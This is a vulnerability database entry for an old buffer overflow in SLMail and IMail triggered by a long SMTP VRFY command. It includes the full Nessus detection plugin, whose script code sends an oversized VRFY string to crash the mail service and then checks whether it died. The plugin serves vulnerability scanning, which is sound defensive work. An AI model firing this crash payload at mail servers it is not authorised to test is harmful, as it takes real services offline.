CVE-1999-0231 - Unspecified vulnerability in Seattle LAB Software Slmail 2.6

CVSS 5.0 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: NONE
Integrity impact: NONE
Availability impact: PARTIAL
Tags: network, low complexity, seattle-lab-software, nessus

Summary

Buffer overflow in IP-Switch IMail and Seattle Labs Slmail 2.6 packages using a long VRFY command, causing a denial of service and possibly remote access.

Vulnerable Configurations

Part         Description           Count
Application  Seattle_Lab_Software  1

Nessus

NASL family: SMTP problems
NASL id: SLMAIL.NASL
description: It was possible to crash the affected SMTP service by sending a VRFY command with a long argument. This attack is known to affect certain versions of Ipswitch IMail and Seattle Labs
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10254
published: 1999-06-22
reporter: This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10254
title: Ipswitch IMail / SLMail VRFY Command Remote Overflow
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
  script_id(10254);
  script_version ("1.34");

  script_cve_id("CVE-1999-0231");

  script_name(english:"Ipswitch IMail / SLMail VRFY Command Remote Overflow");
  script_summary(english:"VRFY aaaaa(...)aaa crashes the remote MTA");

  script_set_attribute(
    attribute:'synopsis',
    value:"The remote mail server is vulnerable to denial of service."
  );

  script_set_attribute(
    attribute:'description',
    value:
"It was possible to crash the affected SMTP service by sending a VRFY
command with a long argument. 

This attack is known to affect certain versions of Ipswitch IMail and
Seattle Labs' SLMail, although products from other vendors may also be
affected. 

An unauthenticated, remote attacker can leverage this issue to conduct
a denial of service attack against the affected mail server."
  );
  script_set_attribute(
    attribute:'solution',
    value:"Contact the product's vendor for an update."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_attribute(
    attribute:'see_also',
    value:"https://seclists.org/bugtraq/1998/Mar/93"
  );
  script_set_attribute(
    attribute:'see_also',
    value:"https://seclists.org/bugtraq/1998/Mar/94"
  );
  script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
  script_set_attribute(attribute:"vuln_publication_date", value: "1998/03/12");
  script_cvs_date("Date: 2018/11/15 20:50:24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:ipswitch:imail");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:seattle_lab_software:slmail_pro");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"SMTP problems");

  script_dependencie("find_service1.nasl", "smtpserver_detect.nasl", "sendmail_expn.nasl");
  script_require_ports("Services/smtp", 25);
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
# Note that slmail is also vulnerable on port 27.
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(1);

data = strcat('VRFY ', crap(4096), '\r\n');
send(socket:soc, data:data);
close(soc);

if (service_is_dead(port: port) > 0)
  security_warning(port);